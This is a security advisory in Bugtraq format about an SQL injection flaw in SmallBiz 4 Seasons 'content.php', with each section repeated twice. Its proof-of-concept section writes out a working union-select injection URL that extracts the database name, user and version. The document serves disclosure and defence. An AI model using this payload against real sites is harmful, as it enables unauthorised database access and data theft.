SmallBiz 4 Seasons 'content.php' SQL Injection Vulnerability
BID:28769
Info
SmallBiz 4 Seasons 'content.php' SQL Injection Vulnerability
| Bugtraq ID: | 28769 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 14 2008 12:00AM |
| Updated: | Apr 18 2008 12:28AM |
| Credit: | cO2 [ Algeria Security Crew ] <[email protected]> |
| Vulnerable: |
SmallBiz 4 Seasons 0 |
| Not Vulnerable: | |
Discussion
SmallBiz 4 Seasons 'content.php' SQL Injection Vulnerability
SmallBiz 4 Seasons is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
SmallBiz 4 Seasons is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
SmallBiz 4 Seasons 'content.php' SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example exploit is available:
http://www.example.com/content.php?id=1/**/union/**/select/**/1,2,convert(concat(database(),char(58),user(),char(58),version()),char),4,5,6,7,8,9/*
Attackers can use a browser to exploit this issue.
The following example exploit is available:
http://www.example.com/content.php?id=1/**/union/**/select/**/1,2,convert(concat(database(),char(58),user(),char(58),version()),char),4,5,6,7,8,9/*
Solution / Fix
SmallBiz 4 Seasons 'content.php' SQL Injection Vulnerability
Solution:
The vendor has released fixes. Users of affected packages should contact the vendor for information on obtaining and applying fixes.
Solution:
The vendor has released fixes. Users of affected packages should contact the vendor for information on obtaining and applying fixes.